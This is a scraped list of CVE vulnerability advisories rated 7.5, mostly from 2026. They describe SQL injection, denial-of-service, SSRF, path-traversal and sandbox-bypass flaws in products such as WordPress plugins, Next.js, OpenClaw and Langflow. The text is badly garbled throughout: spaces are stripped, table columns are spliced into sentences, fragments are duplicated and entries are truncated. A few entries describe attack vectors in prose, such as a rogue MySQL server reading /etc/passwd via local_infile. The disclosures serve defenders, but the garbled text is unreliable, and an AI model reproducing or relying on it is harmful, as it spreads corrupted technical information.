CVE-upto,andincluding,1.2.12.Thisisduetoinsufficientescapingontheusersuppliedparameterandlackof More2026-sufficientpreparationontheexistingSQLqueryinthe`getuseraccess()`method.Thismakesitpossiblefor 7.5 Details2468unauthenticatedattackerstoappendadditionalSQLqueriesintoalreadyexistingqueriesthatcanbeusedto extractsensitiveinformationfromthedatabase. Out-of-boundsreadinALPNparsingduetoincompletevalidation.wolfSSL5.8.4andearliercontainedanout-of- CVE-boundsreadinALPNhandlingwhenbuiltwithALPNenabled(HAVEALPN/--enable-alpn).AcraftedALPNprotocol More2026-listcouldtriggeranout-of-boundsread,leadingtoapotentialprocesscrash(denialofservice).NotethatALPNis 7.5 Details3547disabledbydefault,butisenabledforthese3rdpartycompatibilityfeatures:enable-apachehttpd,enable-bind, enable-curl,enable-haproxy,enable-hitch,enable-lighty,enable-jni,enable-nginx,enable-quic. OpenClawversionspriorto2026.3.2containadenialofservicevulnerabilityinwebhookhandlersforBlueBubblesCVE-andGoogleChatthatparserequestbodiesbeforeperformingauthenticationandsignaturevalidation. More 7.5 Unauthenticatedattackerscanexploitthisbysendingsloworoversizedrequestbodiestoexhaustparser Details32011 resourcesanddegradeserviceavailability. resourcesanddegradeserviceavailability. CVE-Versionsofthepackagejsrsasignbefore11.1.1arevulnerabletoIncorrectConversionbetweenNumericTypes Moreduetohandlingnegativeexponentsinext/jsbn2.js.Anattackercanforcethecomputationofincorrectmodular 7.5 DetailsinversesandbreaksignatureverificationbycallingmodPowwithanegativeexponent. CVE- More2026-Versionspriorto7.15.1and8.9.3containaServer-SideRequestForgery(SSRF)vulnerabilitycombinedwitha 7.5 Details29097DenialofService(DoS)conditionintheRSSFeedDashletcomponent.Versions7.15.1and8.9.3patchtheissue. Versionsofthepackagejsrsasignbefore11.1.1arevulnerabletoInfiniteloopviathebnModInversefunctioninCVE-ext/jsbn2.jswhentheBigInteger.modInverseimplementationreceiveszeroornegativeinputs,allowingan More2026- 7.5attackertohangtheprocesspermanentlybysupplyingsuchcraftedvalues(e.g.,modInverse(0,m)or Details4598modInverse(-1,m)). EasyChatServer3.1containsadenialofservicevulnerabilitythatallowsremoteattackerstocrashtheCVE-applicationbysendingoversizeddatainthemessageparameter.Attackerscanestablishasessionviathe More2019- 7.5chat.ghpendpointandthensendaPOSTrequesttobody2.ghpwithanexcessivelylargemessageparameter Details25613valuetocausetheservicetocrash. CVE-unauthenticatedattackercancausealegitimateDiscourseauthorizationpagetodisplayanattacker-controlled More2026- 7.5domain,facilitatingsocialengineeringattacksagainstusers.Versions2026.3.0-latest.1,2026.2.1,and2026.1.2 Details33427 Discourseisanopen-sourcediscussionplatform.Priortoversions2026.3.0-latest.1,2026.2.1,and2026.1.2,usersCVE-whodonotbelongtotheallowedpolicycreationgroupscancreatefunctionalpolicyacceptancewidgetsinposts More2026- 7.5undertherightconditions.Versions2026.3.0-latest.1,2026.2.1,and2026.1.2containapatch.Asaworkaround, Details29072disablethediscourse-policypluginbydisablingthepolicy_enabledsitesetting. UltraJSONisafastJSONencoderanddecoderwritteninpureCwithbindingsforPython3.7+.Versions5.10 through5.11.0arevulnerabletobufferoverfloworinfiniteloopthroughlargeindenthandling.ujson.dumps() crashesthePythoninterpreter(segmentationfault)whentheproductoftheindentparameterandthenested depthoftheinputexceedsINT32MAX.Itcanalsogetstuckinaninfiniteloopiftheindentisalargenegative CVE-number.Botharecausedbyanintegeroverflow/underflowwhilstcalculatinghowmuchmemorytoreservefor More2026-indentation.Andbothcanbeusedtoachievedenialofservice.Tobevulnerable,aservicemustcall 7.5 Details32875ujson.dump()/ujson.dumps()/ujson.encode()whilstgivinguntrusteduserscontrolovertheindentparameterand notrestrictthatindentationtoreasonablysmallnon-negativevalues.Aservicemayalsobevulnerabletothe infiniteloopifitusesafixednegativeindent.Anunderflowalwaysoccursforanynegativeindentwhentheinput dataisatleastonelevelnestedbut,forsmallnegativeindents,theunderflowisusuallyaccidentallyrectifiedby anotheroverflow.Thisissuehasbeenfixedinversion5.12.0. TheWPMaps–StoreLocator,GoogleMaps,OpenStreetMap,Mapbox,Listing,Directory&FilterspluginforWordPress CVE-isvulnerabletotime-basedSQLInjectionviathe‘orderby’parameterinallversionsupto,andincluding,4.9.1due More2026-toinsufficientescapingontheusersuppliedparameterandlackofsufficientpreparationontheexistingSQL 7.5 Details2580query.ThismakesitpossibleforunauthenticatedattackerstoappendadditionalSQLqueriesintoalreadyexisting queriesthatcanbeusedtoextractsensitiveinformationfromthedatabase. UltraJSONisafastJSONencoderanddecoderwritteninpureCwithbindingsforPython3.7+.Versions5.4.0 through5.11.0containanaccumulatingmemoryleakinJSONparsinglarge(outsideoftherange[-2^63,2^64- 1])integers.TheleakedmemoryisacopyofthestringformoftheintegerplusanadditionalNULLbyte.TheleakCVE-occursirrespectiveofwhethertheintegerparsessuccessfullyorisrejectedduetohavingmorethan More2026- 7.5sys.getintmaxstrdigits()digits,meaningthatanysizedleakpermaliciousJSONcanbeachievedprovidedthat Details32874thereisnolimitontheoverallsizeofthepayload.Anyservicethatcallsujson.load()/ujson.loads()/ujson.decode() onuntrustedinputsisaffectedandvulnerabletodenialofserviceattacks.Thisissuehasbeenfixedinversion 5.12.0. OpenClawversionspriorto2026.3.1failtoenforcesandboxinheritanceduringcross-agentsessionsspawnCVE-operations,allowingsandboxedsessionstocreatechildprocessesunderunsandboxedagents.Anattackerwitha More2026- 7.5sandboxedsessioncanexploitthistospawnchildruntimeswithsandbox.modesettooff,bypassingruntime Details32048confinementrestrictions. eweisaGleamwebserver.Versions0.8.0through3.0.4containabuginthehandletrailersfunctionwhere rejectedtrailerheaders(forbiddenorundeclared)causeaninfiniteloop.Whenhandletrailersencounterssucha trailer,threecodepaths(lines520,523,526)recursewiththeoriginalbuffer(rest)insteadofadvancingpastthe CVE-rejectedheader(Buffer(headerrest,0)),causingdecoder.decodepackettore-parsethesameheaderonevery More 2026- 7.5iteration.Theresultingloophasnotimeoutorescape—theBEAMprocesspermanentlywedgesat100%CPU. Details 32873Anyapplicationthatcallsewe.read_bodyonchunkedrequestsisaffected,andthisisexploitablebyany unauthenticatedremoteclientbeforecontrolreturnstoapplicationcode,makinganapplication-levelworkaround impossible.Thisissueisfixedinversion3.0.5.

SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,theWebSocketendpoint(/ws) allowsunauthenticatedconnectionswhenspecificURLparametersareprovided(? app=siyuan&id=auth&type=auth).Thisbypass,intendedfortheloginpagetokeepthekernelalive,allowsanyCVE- Moreexternalclient—includingmaliciouswebsitesviacross-originWebSocket—toconnectandreceiveallserver 7.5 Details externalclient—includingmaliciouswebsitesviacross-originWebSocket—toconnectandreceiveallserver 7.5 Detailspusheventsinreal-time.Theseeventsleaksensitivedocumentmetadataincludingdocumenttitles,notebook32815 names,filepaths,andallCRUDoperationsperformedbyauthenticatedusers.Combinedwiththeabsenceof Originheadervalidation,amaliciouswebsitecansilentlyconnecttoavictim'slocalSiYuaninstanceandmonitor theirnote-takingactivity.Thisissuehasbeenfixedinversion3.6.1. CVE-OpenClawversionspriorto2026.2.22failtoconsistentlyenforceconfiguredinboundmediabytelimitsbefore More2026-bufferingremotemediaacrossmultiplechannelingestionpaths.Remoteattackerscansendoversizedmedia 7.5 Details32049payloadstotriggerelevatedmemoryusageandpotentialprocessinstability. AutoMapperisaconvention-basedobject-objectmapperin.NET.Versionspriorto15.1.1and16.1.1are CVE-vulnerabletoaDenialofService(DoS)attack.Whenmappingdeeplynestedobjectgraphs,thelibraryuses More2026-recursivemethodcallswithoutenforcingadefaultmaximumdepthlimit.Thisallowsanattackertoprovidea 7.5 Details32933speciallycraftedobjectgraphthatexhauststhethread'sstackmemory,triggeringaStackOverflowException andcausingtheentireapplicationprocesstoterminate.Versions15.1.1and16.1.1fixtheissue. WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,theHLSstreamingendpoint (view/hls.php)isvulnerabletoapathtraversalattackthatallowsanunauthenticatedattackertostreamanyCVE-privateorpaidvideoontheplatform.ThevideoDirectoryGETparameterisusedintwodivergentcodepaths— More2026- 7.5oneforauthorization(whichtruncatesatthefirst/segment)andoneforfileaccess(whichpreserves.. Details33292traversalsequences)—creatingasplit-oracleconditionwhereauthorizationischeckedagainstonevideowhile contentisservedfromanother.Version26.0containsafixfortheissue. CVE-EquityPandit1.0containsaninsecureloggingvulnerabilitythatallowsattackerstocapturesensitiveuser More2019-credentialsbyaccessingdeveloperconsolelogsviaAndroidDebugBridge.Attackerscanuseadblogcattoextract 7.5 Details25605plaintextpasswordsloggedduringtheforgotpasswordfunction,exposinguseraccountcredentials. TheWPJobPortalpluginforWordPressisvulnerabletoSQLInjectionviathe'radius'parameterinallversionsupCVE-to,andincluding,2.4.8duetoinsufficientescapingontheusersuppliedparameterandlackofsufficient More2026- 7.5preparationontheexistingSQLquery.Thismakesitpossibleforunauthenticatedattackerstoappendadditional Details4306SQLqueriesintoalreadyexistingqueriesthatcanbeusedtoextractsensitiveinformationfromthedatabase. ModgnutlsisaTLSmoduleforApacheHTTPDbasedonGnuTLS.Inversionspriorto0.12.3and0.13.0,codefor clientcertificateverificationimportedthecertificatechainsentbytheclientintoafixedsize`gnutlsx509crtt x509[]arraywithoutcheckingthenumberofcertificatesislessthanorequaltothearraysize.gnutlsx509crttisatypedefforapointertoanopaqueGnuTLSstructurecreatedusingwithgnutlsx509crtinit()beforeimportingcertificatedataintoit,sonoattacker-controlleddatawaswrittenintoCVE-thestackbuffer,butwritingapointerafterthelastarrayelementgenerallytriggeredasegfault,andcould More2026- 7.5theoreticallycausestackcorruptionotherwise(notobservedinpractice).Serverconfigurationsthatdonotuse Details33307clientcertificates(GnuTLSClientVerifyignore,thedefault)arenotaffected.Theproblemhasbeenfixedin version0.12.3bycheckingthelengthoftheprovidedcertificatechainandrejectingitifitexceedsthebuffer length,andinversion0.13.0byrewritingcertificateverificationtousegnutlscertificateverifypeers(), removingtheneedforthebufferentirely.Thereisnoworkaround.Version0.12.3providestheminimalfixfor usersof0.12.xwhodonotwishtoupgradeto0.13.0yet. CVE-MissingReleaseofMemoryafterEffectiveLifetimevulnerabilityinMolotovCherryAndroid-ImageMagick7.This More2026- 7.5issueaffectsAndroid-ImageMagick7:before7.1.2-11. Details33852 CVE-IncorrectboundaryconditionsintheLayout:TextandFontscomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5 Details4699 CVE-IncorrectboundaryconditionsintheAudio/Video:WebCodecscomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. Details4697 CVE-IncorrectboundaryconditionsintheAudio/Video:WebCodecscomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. Details4695 CVE-IncorrectboundaryconditionsintheAudio/Video:Playbackcomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5 Details4693 Glancesisanopen-sourcesystemcross-platformmonitoringtool.TheGHSA-gh4xfix(commit5d3de60) addressedunauthenticatedconfigurationsecretsexposureonthe/api/v4/configendpointsbyintroducingasdictsecure()redaction.However,the/api/v4/argsand/api/v4/args/{item}endpointswerenotaddressedCVE- Morebythisfix.Theseendpointsreturnthecompletecommand-lineargumentsnamespaceviavars(self.args)`,which2026- 7.5 Detailsincludesthepasswordhash(salt+pbkdf2hmac),SNMPcommunitystrings,SNMPauthenticationkeys,andthe32609 configurationfilepath.WhenGlancesrunswithout--password(thedefault),theseendpointsareaccessible withoutanyauthentication.Version4.5.2providesamorecompletefix. CVE- 7.5 More Details FirefoxESR<115.34,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. Details CVE- More 7.5 Details Jenkins2.442through2.554(bothinclusive),LTS2.426.3throughLTS2.541.2(bothinclusive)performsoriginCVE-validationofrequestsmadethroughtheCLIWebSocketendpointbycomputingtheexpectedoriginfor More2026- 7.5comparisonusingtheHostorX-Forwarded-HostHTTPrequestheaders,makingitvulnerabletoDNSrebinding Details33002attacksthatallowbypassingoriginvalidation. CVE-Racecondition,use-after-freeintheGraphics:WebRendercomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5 Details4684 CVE-AzipslipvulnerabilityintheAdminimportfunctionalityofCTFdv3.8.1-18-gdb5a18c4allowsattackerstowrite More2026- 7.5arbitraryfilesoutsidetheintendeddirectoriesviasupplyingacraftedimport. Details30345 CVE-AnunauthenticatedremoteattackermaybeabletocontroltheformatstringofmessagesprocessedbytheAudit More2026- 7.5LogoftheCODESYSControlruntimesystem,potentiallyresultinginadenial‑of‑service(DoS)condition. Details3509 CVE-MissingReleaseofMemoryafterEffectiveLifetimevulnerabilityinMolotovCherryAndroid-ImageMagick7.This More2026- 7.5issueaffectsAndroid-ImageMagick7:before7.1.2-11. Details33856 CVE- More2026- 7.5 Details4706 nghttp2isanimplementationoftheHypertextTransferProtocolversion2inC.Priortoversion1.68.1,the nghttp2librarystopsreadingtheincomingdatawhenuserfacingpublicAPInghttp2_session_terminate_session CVE-ornghttp2_session_terminate_session2iscalledbytheapplication.Theymightbecalledinternallybythelibrary More2026-whenitdetectsthesituationthatissubjecttoconnectionerror.Duetothemissinginternalstatevalidation,the 7.5 Details27135librarykeepsreadingtherestofthedataafteroneofthoseAPIsiscalled.Thenreceivingamalformedframethat causesFRAMESIZEERRORcausesassertionfailure.nghttp2v1.68.1addsmissingstatevalidationtoavoid assertionfailure.Noknownworkaroundsareavailable. CVE-AnissueintheVirtualHostconfigurationhandling/parsercomponentofaaPanelv7.57.0allowsattackerstocause More2026- 7.5aRegularExpressionDenialofService(ReDoS)viaacraftedinput. Details29856 CVE-AlackofpathvalidationinaaPanelv7.57.0allowsattackerstoexecutealocalfileinclusion(LFI),leadingot More2026- 7.5sensitiveinformationexposure. Details29858 TheJetEnginepluginforWordPressisvulnerabletoSQLInjectionviathelisting_load_moreAJAXactioninall versionsupto,andincluding,3.8.6.1.Thisisduetothefiltered_queryparameterbeingexcludedfromtheHMAC CVE-signaturevalidation(allowingattacker-controlledinputtobypasssecuritychecks)combinedwiththe More2026-prepare_where_clause()methodintheSQLQueryBuildernotsanitizingthecompareoperatorbefore 7.5 Details4662concatenatingitintoSQLstatements.Thismakesitpossibleforunauthenticatedattackerstoappendadditional SQLqueriesintoalreadyexistingqueriesthatcanbeusedtoextractsensitiveinformationfromthedatabase, providedthesitehasaJetEngineListingGridwithLoadMoreenabledthatusesaSQLQueryBuilderquery. CVE-VitalsESPdevelopedbyGalaxySoftwareServiceshasaMissingAuthenticationvulnerability,allowing More2026- 7.5unauthenticatedremoteattackerstoexecutecertainfunctionstoobtainsensitiveinformation. Details4640

DNAsequencealignmentdatausingavarietyofencodingsandcompressionmethods.Whilemostalignment recordsstoreDNAsequenceandqualityvalues,theformatalsoallowsthemtoomitthisdataincertaincasesto CVE-savespace.DuetosomequirksoftheCRAMformat,itisnecessarytohandletheserecordscarefullyastheywill More 2026-actuallystoredatathatneedstobeconsumedandthendiscarded.UnfortunatelytheCONST,XPACKand 7.5 Details 31964XRLEencodingsdidnotproperlyimplementtheinterfaceneededtodothis.Tryingtodecoderecordswith omittedsequenceorqualitydatausingtheseencodingswouldresultinanattempttowritetoaNULLpointer. ExploitingthisbugcausesaNULLpointerdereference.Typicallythiswillcausetheprogramtocrash.Versions 1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthisissue. SAMtoolsisaprogramforreading,manipulatingandwritingbioinformaticsfileformats.Startinginversion1.17,in CVE-thecram-sizecommand,usedtowriteinformationabouthowwellCRAMfilesarecompressed,achecktoseeif Morethecram_decode_compression_header()wasmissing.Ifthefunctionreturnedanerror,thiscouldleadtoaNULL 7.5 Details31973pointerdereference.ExploitingthisbugcausesaNULLpointerdereference.Typicallythiswillcausetheprogram tocrash.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthisissue.

PJSIPisafreeandopensourcemultimediacommunicationlibrarywritteninC.Versions2.16andbelowhavea CVE-cascadingout-of-boundsheapreadinpjsipmultipartparse().Afterboundarystringmatching,curptrisadvanced Morepastthedelimiterwithoutverifyingithasnotreachedthebufferend.Thisallows1-2bytesofadjacentheap 7.5 Details33069memorytoberead.AllapplicationsthatprocessincomingSIPmessageswithmultipartbodiesorSDPcontentare potentiallyaffected.Thisissueisresolvedinversion2.17. Qwikisaperformance-focusedJavaScriptframework.Versionspriorto1.19.2improperlyinferredarraysfrom dottedformfieldnamesduringFormDataparsing.Bysubmittingmixedarray-indexandobject-propertykeysfor thesamepath,anattackercouldcauseuser-controlledpropertiestobewrittenontovaluesthatapplicationcode CVE-expectedtobearrays.Whenprocessingapplication/x-www-form-urlencodedormultipart/form-datarequests, More2026-QwikCityconverteddottedfieldnames(e.g.,items.0,items.1)intonestedstructures.Ifapathwasinterpretedas 7.5 Details32701anarray,additionalattacker-suppliedkeysonthatpath—suchasitems.toString,items.push,items.valueOf,or items.length—couldaltertheresultingserver-sidevalueinunexpectedways,potentiallyleadingtorequest handlingfailures,denialofservicethroughmalformedarraystateoroversizedlengths,andtypeconfusionin downstreamcode.Thisissuewasfixedinversion1.19.2. OneUptimeisasolutionformonitoringandmanagingonlineservices.Priortoversion10.0.34,theWhatsApp POSTwebhookhandler(/notification/whatsapp/webhook)processesincomingstatusupdateeventswithoutCVE-verifyingtheMeta/WhatsAppX-Hub-Signature-256HMACsignature,allowinganyunauthenticatedattackerto More2026- 7.5sendforgedwebhookpayloadsthatmanipulatenotificationdeliverystatusrecords,suppressalerts,andcorrupt Details33143audittrails.ThecodebasealreadyimplementspropersignatureverificationforSlackwebhooks.Thisissuehas beenpatchedinversion10.0.34. SQLBotisanintelligentdataquerysystembasedonalargelanguagemodelandRAG.Versionspriorto1.7.0 containaServer-SideRequestForgery(SSRF)vulnerabilitythatallowsanattackertoretrievearbitrarysystemand applicationfilesfromtheserver.Anattackercanexploitthe/api/v1/datasource/checkendpointbyconfiguringaCVE-forgedMySQLdatasourcewithamaliciousparameterextraJdbc="local_infile=1".WhentheSQLBotbackend More2026- 7.5attemptstoverifytheconnectivityofthisdatasource,anattacker-controlledRogueMySQLserverissuesa Details32949maliciousLOADDATALOCALINFILEcommandduringtheMySQLhandshake.Thisforcesthetargetservertoread arbitraryfilesfromitslocalfilesystem(suchas/etc/passwdorconfigurationfiles)andtransmitthecontentsback totheattacker.Thisissuewasfixedinversion1.7.0. CVE-Denial-of-serviceintheWebRTC:Signalingcomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR< More2026- 7.5 Details4704 CVE- More2026- 7.5 Details4707

9.6.0-alpha.24and8.6.47,remoteclientscancrashtheParseServerprocessbycallingacloudfunctionendpointCVE-withacraftedfunctionnamethattraversestheJavaScriptprototypechainofaregisteredcloudfunctionhandler, More2026- 7.5causingastackoverflow.Thefixinversions9.6.0-alpha.24and8.6.47restrictspropertylookupsduringcloud Details32886functionnameresolutiontoownpropertiesonly,preventingprototypechaintraversalfromstoredfunction handlers.Thereisnoknownworkaround. Glancesisanopen-sourcesystemcross-platformmonitoringtool.Priorto4.5.2,GlanceswebserverrunswithoutCVE-authenticationbydefaultwhenstartedwithglances-w,exposingRESTAPIwithsensitivesysteminformation More2026- 7.5includingprocesscommand-linescontainingcredentials(passwords,APIkeys,tokens)toanynetworkclient. Details32596 CVE-NVIDIATritonInferenceServercontainsavulnerabilityintheHTTPendpointwhereanattackermaycauseadenial More2026-ofservicebyprovidingalargecompressedpayload.Asuccessfulexploitofthisvulnerabilitymayleadtodenialof 7.5 Details24158service.

16.1.7,arequestcontainingthenext-resume:1header(correspondingwithaPPRresumerequest)wouldbuffer requestbodieswithoutconsistentlyenforcingmaxPostponedStateSizeincertainsetups.Thepreviousmitigation protectedminimal-modedeployments,butequivalentnon-minimaldeploymentsremainedvulnerabletothesame unboundedpostponedresume-bodybufferingbehavior.InapplicationsusingtheAppRouterwithPartialCVE- MorePrerenderingcapabilityenabled(viaexperimental.pprorcacheComponents),anattackercouldsendoversized2026- 7.5 Detailsnext-resumePOSTpayloadsthatwerebufferedwithoutconsistentsizeenforcementinnon-minimal27979 deployments,causingexcessivememoryusageandpotentialdenialofservice.Thisisfixedinversion16.1.7by enforcingsizelimitsacrossallpostponed-bodybufferingpathsanderroringwhenlimitsareexceeded.If upgradingisnotimmediatelypossible,blockrequestscontainingthenext-resumeheader,asthisisnevervalid tobesentfromanuntrustedclient. Next.jsisaReactframeworkforbuildingfull-stackwebapplications.Startinginversion10.0.0andpriortoversion 16.1.7,thedefaultNext.jsimageoptimizationdiskcache(/_next/image)didnothaveaconfigurableupper bound,allowingunboundedcachegrowth.Anattackercouldgeneratemanyuniqueimage-optimizationvariantsCVE-andexhaustdiskspace,causingdenialofservice.Thisisfixedinversion16.1.7byaddinganLRU-backeddisk More cachewithimages.maximumDiskCacheSize,includingevictionofleast-recently-usedentrieswhenthelimitis Details 7.5 exceeded.SettingmaximumDiskCacheSize:0disablesdiskcaching.Ifupgradingisnotimmediatelypossible,27980 exceeded.SettingmaximumDiskCacheSize:0disablesdiskcaching.Ifupgradingisnotimmediatelypossible,27980 periodicallyclean.next/cache/imagesand/orreducevariantcardinality(e.g.,tightenvaluesfor images.localPatterns,images.remotePatterns,andimages.qualities). CVE-NVIDIATritonInferenceServercontainsavulnerabilitywhereanattackermaycauseinternalstatecorruption.A More 7.5successfulexploitofthisvulnerabilitymayleadtoadenialofservice. Details33254 CVE-NVIDIATritonInferenceServerSagemakerHTTPservercontainsavulnerabilitywhereanattackermaycausean More2025- 7.5exception.Asuccessfulexploitofthisvulnerabilitymayleadtodenialofservice. Details33238 pyLoadisafreeandopen-sourcedownloadmanagerwritteninPython.Fromversion0.4.0tobeforeversion 0.5.0b3.dev97,thesetconfigvalue()APIendpointallowsuserswiththenon-adminSETTINGSpermissionto CVE-modifyanyconfigurationoptionwithoutrestriction.Thereconnect.scriptconfigoptioncontrolsafilepaththatis More2026-passeddirectlytosubprocess.run()inthethreadmanager'sreconnectlogic.ASETTINGSusercansetthistoany 7.5 Details33509executablefileonthesystem,achievingRemoteCodeExecution.Theonlyvalidationinsetconfigvalue()isa hardcodedcheckforgeneral.storagefolder—allothersecurity-criticalsettingsincludingreconnect.scriptare writablewithoutanyallowlistorpathrestriction.Thisissuehasbeenpatchedinversion0.5.0b3.dev97. Vikunjaisanopen-sourceself-hostedtaskmanagementplatform.Priortoversion2.2.2,the LinkSharing.ReadAll()methodallowslinkshareauthenticateduserstolistalllinksharesforaproject,includingCVE-theirsecrethashes.WhileLinkSharing.CanRead()correctlyblockslinkshareusersfromreadingindividual More2026- 7.5sharesviaReadOne,theReadAllWebhandlerbypassesthischeckbynevercallingCanRead().Anattacker Details33680witharead-onlylinksharecanretrievehashesforwriteoradminlinksharesonthesameprojectand authenticatewiththem,escalatingtofulladminaccess.Version2.2.2patchestheissue. DiceBearisanavatarlibraryfordesignersanddevelopers.Priortoversion9.4.0,theensureSize()functionin @dicebear/converterreadthewidthandheightattributesfromtheinputSVGtodeterminetheoutput canvassizeforrasterization(PNG,JPEG,WebP,AVIF).AnattackerwhocansupplyacraftedSVGwithextremely largedimensions(e.g.width="999999999")couldforcetheservertoallocateexcessivememory,leadingto CVE-denialofservice.Thisprimarilyaffectsserver-sideapplicationsthatpassuntrustedoruser-suppliedSVGstothe More2026-converter'stoPng(),toJpeg(),toWebp(),ortoAvif()functions.Applicationsthatonlyconvertself-generated 7.5 Details29112DiceBearavatarsarenotpracticallyexploitable,butarestillrecommendedtoupgrade.Thisisfixedinversion 9.4.0.TheensureSize()functionnolongerreadsSVGattributestodetermineoutputsize.Instead,anewsize option(default:512,max:2048)controlstheoutputdimensions.Invalidvalues(NaN,negative,zero,Infinity)fall backtothedefault.Ifupgradingisnotimmediatelypossible,validateandsanitizethewidthandheight attributesofanyuntrustedSVGinputbeforepassingittotheconverter. pyasn1isagenericASN.1libraryforPython.Priorto0.6.3,thepyasn1libraryisvulnerabletoaDenialof Service(DoS)attackcausedbyuncontrolledrecursionwhendecodingASN.1datawithdeeplynestedstructures. AnattackercansupplyacraftedpayloadcontainingthousandsofnestedSEQUENCE(0x30)orSET(0x31)CVE-tagswith"IndefiniteLength"(0x80)markers.ThisforcesthedecodertorecursivelycallitselfuntilthePython More2026- 7.5interpretercrasheswithaRecursionErrororconsumesallavailablememory(OOM),crashingthehost Details30922application.ThisisadistinctvulnerabilityfromCVE-2026-23490(whichaddressedintegeroverflowsinOID decoding).ThefixforCVE-2026-23490(`MAXOIDARCCONTINUATIONOCTETS)doesnotmitigatethisrecursion issue.Version0.6.3fixesthisspecificissue. CVE-music-metadataisametadataparserforaudioandvideomediafiles.Priortoversion11.12.3,music-metadata's More2026-ASFparser(parseExtensionObject()inlib/asf/AsfParser.ts:112-158)entersaninfiniteloopwhenasub-object 7.5 Details32256insidetheASFHeaderExtensionObjecthasobjectSize=0`.Version11.12.3fixestheissue. ipmi-oeminFreeIPMIbefore1.16.17hasexploitablebufferoverflowsonresponsemessages.TheIntelligent PlatformManagementInterface(IPMI)specificationdefinesasetofinterfacesforplatformmanagement.Itis implementedbyalargenumberofhardwaremanufacturerstosupportsystemmanagement.Itismostcommonly usedforsensorreading(e.g.,CPUtemperaturesthroughtheipmi-sensorscommandwithinFreeIPMI)andremote CVE-powercontrol(theipmipowercommand).Theipmi-oemclientcommandimplementsasetofaIPMIOEM More2026-commandsforspecifichardwarevendors.Ifauserhassupportedhardware,theymaywishtousetheipmi-oem 7.5 Details33554commandtosendarequesttoaservertoretrievespecificinformation.Threesubcommandswerefoundtohave exploitablebufferoverflowsonresponsemessages.Theyare:"ipmi-oemdellget-last-post-code-getthelast POSTcodeandstringdescribingtheerroronsomeDellservers,""ipmi-oemsupermicroextra-firmware-info-get extrafirmwareinfoonSupermicroservers,"and"ipmi-oemwistronread-proprietary-string-readaproprietary stringonWistronservers." H3isaminimalH(TTP)framework.Inversionspriorto1.15.6andbetween2.0.0through2.0.1-rc.14, createEventStreamisvulnerabletoServer-SentEvents(SSE)injectionduetomissingnewlinesanitizationinCVE- MoreformatEventStreamMessage()andformatEventStreamComment().AnattackerwhocontrolsanypartofanSSE2026- 7.5 Detailsmessagefield(id,event,data,orcomment)caninjectarbitrarySSEeventstoconnectedclients.Thisissueis33128 fixedinversions1.15.6and2.0.1-rc.15. CVE-IncorrectboundaryconditionsintheGraphicscomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR< More 7.5 Details CVE-AnissueinFree5GCv.4.2.0andbeforeallowsaremoteattackertocauseadenialofserviceviathefunction More 7.5 AnissueinFree5GCv.4.2.0andbeforeallowsaremoteattackertocauseadenialofserviceviathefunction More 7.5HandleAuthenticationFailureofthecomponentAMF Details30653 WhenthengxmailauthhttpmodulemoduleisenabledonNGINXPlusorNGINXOpenSource,undisclosedCVE-requestscancauseworkerprocessestoterminate.Thisissuemayoccurwhen(1)CRAM-MD5orAPOP More 7.5authenticationisenabled,and(2)theauthenticationserverpermitsretrybyreturningtheAuth-Waitresponse Details27651header.Note:SoftwareversionswhichhavereachedEndofTechnicalSupport(EoTS)arenotevaluated. LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Priortoversion1.7.1,intheCVE-downloadprofilepicturefunctionofthe/profilepictures/{foldername}/{filename}endpoint,thefoldername More2026- 7.5andfilenameparametersarenotstrictlyfiltered,whichallowsthesecretkeytobereadacrossdirectories. Details33497Version1.7.1containsapatch. LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Inversions1.0.0through1.8.1, the`/api/v1/files/images/{flowid}/{filename}`endpointservesimagefileswithoutanyauthenticationorCVE-ownershipcheck.AnyunauthenticatedrequestwithaknownflowidandfilenamereturnstheimagewithHTTP More2026- 7.5200.Inamulti-tenantdeployment,anyattackerwhocandiscoverorguessa`flowid(UUIDscanbeleaked Details33484throughotherAPIresponses)candownloadanyuser'suploadedimageswithoutcredentials.Version1.9.0 containsapatch. DiceBearisanavatarlibraryfordesignersanddevelopers.Priortoversion9.4.2,theensureSize()functionin@dicebear/converterusedaregex-basedapproachtorewriteSVGwidth/heightattributes,cappingthemat 2048pxtopreventdenialofservice.ThissizecappingcouldbebypassedbycraftingSVGinputthatcausesthe CVE-regextomatchanon-functionaloccurrenceof